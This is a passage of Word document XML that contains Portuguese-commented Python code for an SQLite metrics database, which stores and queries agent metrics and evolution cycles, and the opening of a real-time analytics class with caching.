        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Banco de dados de m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:t>tricas inicializado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E2D02" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C175D3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def store_metric(self, metric: RealTimeMetric):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D20029" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Armazena uma métrica no banco"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735CFCEF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn = sqlite3.connect(self.db_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51604712" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75936D41" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D35026" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB68D42" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            INSERT INTO metrics (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1255F372" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                agent_id, metric_name, value, timestamp, unit,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0669276C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                confidence_level, statistical_significance, p_value, sample_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1A06E5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00873C90" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """, (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2B0AB8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            metric.agent_id, metric.metric_name, metric.value,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11472DB5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            metric.timestamp, metric.unit, metric.confidence_level,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B1372B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            metric.statistical_significance, metric.p_value, metric.sample_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139E523A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC53A3C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1857EE5C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005FFBBE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4963F6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038CE090" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def store_evolution_cycle(self, agent_id: str, cycle_data: Dict[str, Any]):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8FB07B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Armazena dados de um ciclo de evolução"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7972330D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn = sqlite3.connect(self.db_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1D67CB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C23AA24" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F430749" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297B5E0D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            INSERT INTO evolution_cycles (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD3ED17" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                agent_id, cycle_number, cycle_type, start_time, end_time,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B796C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration_ms, improvements_count, performance_delta, success, details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AE1DFF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C1797C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """, (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745E4636" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB88059" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cycle_data.get('cycle_number', 0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4420C48D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cycle_data.get('cycle_type', 'unknown'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3821367B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cycle_data.get('start_time'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D33DDAE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cycle_data.get('end_time'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CC439C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cycle_data.get('duration_ms', 0.0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4AAAFD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cycle_data.get('improvements_count', 0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478E745E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cycle_data.get('performance_delta', 0.0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F13066D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cycle_data.get('success', True),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EA59FD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            json.dumps(cycle_data.get('details', {}))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548B294F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BC92D6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525A2576" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675BF44F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB86FBD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A374DC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def get_agent_metrics(self, agent_id: str, hours: int = 24) -&gt; List[Dict[str, Any]]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C6F58A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Recupera métricas de um agente"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC66BE7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn = sqlite3.connect(self.db_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A263C4E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E46FCD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A1E1CA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        since = datetime.now() - timedelta(hours=hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5FE5CF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0037E6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6D5C81" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            SELECT * FROM metrics </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118294B6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            WHERE agent_id = ? AND timestamp &gt;= ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598FC768" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            ORDER BY timestamp DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE1D0F2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """, (agent_id, since))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2119D0E6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766FBA21" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        columns = [desc[0] for desc in cursor.description]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37447522" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        results = [dict(zip(columns, row)) for row in cursor.fetchall()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584E579E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50842010" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CEF394" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        return results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596378F0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582378E9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def get_evolution_cycles(self, agent_id: str = None) -&gt; List[Dict[str, Any]]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E267CC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Recupera ciclos de evolução"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB4DF30" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn = sqlite3.connect(self.db_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E32BB9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1138A4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B6BCA7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        if agent_id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E701AAD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBC27AD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                SELECT * FROM evolution_cycles </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464B06F7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                WHERE agent_id = ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475719E1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                ORDER BY cycle_number DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7388B902" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            """, (agent_id,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E6D9F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13305C2F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414D2E5F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                SELECT * FROM evolution_cycles </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F8CE4C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                ORDER BY start_time DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0F2702" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5832B2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9DAEA2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        columns = [desc[0] for desc in cursor.description]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224139C5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        results = [dict(zip(columns, row)) for row in cursor.fetchall()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5207E5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5505A10D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540046CA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        return results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A88FC5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A050FB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def get_total_cycles_by_agent(self) -&gt; Dict[str, int]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4F93EA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Retorna total de ciclos por agente"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EA2C9B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn = sqlite3.connect(self.db_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BE23C7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F7198" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365A810" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DED5177" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            SELECT agent_id, COUNT(*) as total_cycles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145B3267" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            FROM evolution_cycles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A949C0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            GROUP BY agent_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7F044C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D49E45" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC87B8E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        results = dict(cursor.fetchall())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1238E329" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6F56F1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        return results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6967141F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="327BC86C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="51C4A4EF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>class RealTimeAnalytics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF84C85" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    """Sistema de analytics avançado em tempo real"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C9980" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B9C832" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def __init__(self, db: MetricsDatabase):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47421A61" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.db = db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFACA83" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.cache = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2937E42D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.cache_ttl = 60  # 1 minuto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60394AFE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FED867" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def calculate_performance_trends(self, agent_id: str, hours: int = 24) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC0B100" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Calcula tendências de performance com validação estatística"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A530EB6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cache_key = f"trends_{agent_id}_{hours}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F68416B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA295E4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        if cache_key in self.cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315D1496" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            cached_data, timestamp = self.cache[cache_key]</w:t>
      </w:r>
    </w:p>
